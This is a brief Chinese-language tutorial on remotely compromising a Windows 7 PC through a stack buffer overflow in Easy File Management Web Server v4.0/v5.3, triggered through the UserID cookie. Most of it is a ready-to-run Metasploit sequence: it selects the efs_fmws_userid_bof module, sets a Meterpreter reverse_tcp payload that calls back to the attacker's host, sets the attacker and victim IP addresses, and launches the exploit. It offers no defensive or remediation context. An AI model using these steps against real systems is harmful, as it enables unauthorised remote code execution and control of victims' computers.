黑客远程Windows PC上使用简单的文件管理Web服务器堆栈缓冲区溢出
Easy File Management Web Server v4.0 and v5.3 包含堆栈缓冲区溢出的情况下,为用户提供触发输入不正确验证用户ID Cookie时处理。这可能允许远程攻击者执行任意代码。
要求
攻击者:BackBox Linux
受害者的电脑:Windows 7
打开控制端msfconsole
use exploit/windows/http/efs_fmws_userid_bof
msf exploit (efs_fmws_userid_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (efs_fmws_userid_bof)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (efs_fmws_userid_bof)>set rhost 192.168.1.2 (IP of Remote Host)
msf exploit (efs_fmws_userid_bof)>exploit